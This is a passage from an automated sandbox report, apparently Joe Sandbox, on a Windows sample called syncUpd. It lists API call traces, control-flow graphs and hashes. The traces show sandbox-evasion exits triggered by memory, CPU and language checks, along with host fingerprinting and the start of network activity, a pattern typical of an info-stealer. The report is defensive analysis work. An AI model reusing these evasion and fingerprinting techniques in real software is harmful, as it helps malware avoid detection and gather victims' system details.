  • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,00941390), ref: 00415F73
  • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,0095C7E0), ref: 00415F8B
  • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,0095C0D8), ref: 00415FA3
  • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,0095C098), ref: 00415FBC
  • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,00941378), ref: 00415FD4
  • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,009413C0), ref: 00415FEC
  • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,009413D8), ref: 00416005
  • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,009413F0), ref: 0041601D
  • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,0095BD78), ref: 00416035
  • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,00941408), ref: 0041604E
  • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
  • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1
  • Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
  • Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E
  • Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
  • Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
  • Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                                                                                                                                • Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                                                                                                                                • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                                                                                                                                • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                                                                                                                                • Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                                                                                                                                • Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434
                                                                                                                                                                                                                                                              • GetUserDefaultLangID.KERNEL32 ref: 004136E6
                                                                                                                                                                                                                                                                • Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,0095DA10,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                                                • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                                                • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                                • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                                • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0095C850,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,0095C850,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleLangName__aulldiv$ComputerCreateCurrentGlobalInfoMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1125299040-0
                                                                                                                                                                                                                                                              • Opcode ID: 6c85d108d3fdb6cf77c2a5a42fa03fa3f94c77551ea5e880e5838d95f1ce7655
                                                                                                                                                                                                                                                              • Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c85d108d3fdb6cf77c2a5a42fa03fa3f94c77551ea5e880e5838d95f1ce7655
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,00964670,00000000,000F003F,?,00000400), ref: 00414C89
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00414C9E
                                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,009646A0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
                                                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 00414DA5
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414DB7
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                              • String ID: %s\%s
                                                                                                                                                                                                                                                              • API String ID: 3896182533-4073750446
                                                                                                                                                                                                                                                              • Opcode ID: d09925fd7800ae11ecd0c951c3039c3b7733374e7b6ec90e923639f19283a629
                                                                                                                                                                                                                                                              • Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d09925fd7800ae11ecd0c951c3039c3b7733374e7b6ec90e923639f19283a629
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              control_flow_graph 1077 4011e0-401207 call 415090 GlobalMemoryStatusEx 1080 401233-40123a 1077->1080 1081 401209-401231 call 41a0b0 * 2 1077->1081 1083 401241-401245 1080->1083 1081->1083 1085 401247 1083->1085 1086 40125a-40125d 1083->1086 1088 401252-401254 ExitProcess 1085->1088 1089 401249-401250 1085->1089 1089->1086 1089->1088
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                                              • API String ID: 3404098578-2766056989
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00960AA8,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,009651C8,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              control_flow_graph 1091 414300-414343 GetProcessHeap HeapAlloc RegOpenKeyExA 1092 414362-414372 RegCloseKey 1091->1092 1093 414345-41435c RegQueryValueExA 1091->1093 1093->1092
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00960A38,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,00964898,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                                                                                                                                • Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                                                                                                                                • Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                                                                                                                                • Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                • Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                                                                                                                                • Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                                                                                                                                • Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,00960A38,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                                                                                                                                • Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,00964898,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                                                                                                                                • Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                                                                                                                                • Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,00965048,00000000,?,0041D74C,00000000,?,00000000,00000000,?,0095DBD0), ref: 0041438F
                                                                                                                                                                                                                                                                • Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,00965048,00000000,?,0041D74C,00000000,?,00000000,00000000,?,0095DBD0), ref: 00414396
                                                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,0095DA10,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                                                • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                                                • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                                • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                                • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                                • Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
                                                                                                                                                                                                                                                                • Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
                                                                                                                                                                                                                                                                • Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
                                                                                                                                                                                                                                                                • Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0
                                                                                                                                                                                                                                                                • Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00964808,00000000,?,0041D758,00000000,?,00000000,00000000,?,00964FC8,00000000), ref: 004144C0
                                                                                                                                                                                                                                                                • Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                                                                • Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                                                                • Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,00964808,00000000,?,0041D758,00000000,?,00000000,00000000,?,00964FC8,00000000), ref: 00414542
                                                                                                                                                                                                                                                                • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                                                                                                                                • Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                                                                                                                                • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                                                                                                                                • Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                                                                                                                                • Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                                                                                                                                • Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A
                                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,009650A8,00000000,?,0041D76C,00000000,?,00000000,00000000,?,00964790,00000000,?,0041D768,00000000), ref: 0041037E
                                                                                                                                                                                                                                                                • Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                                                                                                                                • Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                                                                                                                                • Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                                                                                                                                • Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                                                                                                                                • Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                                                                                                                                • Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,00960AA8,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                                                                                                                                • Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,009651C8,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                                                                                                                                • Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                                                                                                                                                                                • Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
                                                                                                                                                                                                                                                                • Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855
                                                                                                                                                                                                                                                                • Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
                                                                                                                                                                                                                                                                • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,00964718,00000000,?,0041D774,00000000,?,00000000,00000000,?,00964778), ref: 0041496D
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9
                                                                                                                                                                                                                                                                • Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
                                                                                                                                                                                                                                                                • Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
                                                                                                                                                                                                                                                                • Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D
                                                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,009620A8,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                                                • Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                                                • Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                                                                                                                                • Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                                                                                                                                • Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                                                                                                                                • Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B
                                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,0095DC90), ref: 00404ED9
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
                                                                                                                                                                                                                                                              • String ID: E.A
                                                                                                                                                                                                                                                              • API String ID: 1035121393-2211245587
                                                                                                                                                                                                                                                              • Opcode ID: 4f11f7d606cdcca733d3e5a0bfdd28226123bb9e0771b4cb204d51c444cdd33f
                                                                                                                                                                                                                                                              • Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f11f7d606cdcca733d3e5a0bfdd28226123bb9e0771b4cb204d51c444cdd33f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0095C850,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,0095C850,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 941982115-0
                                                                                                                                                                                                                                                              • Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                                                                                                                                                                              • Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8
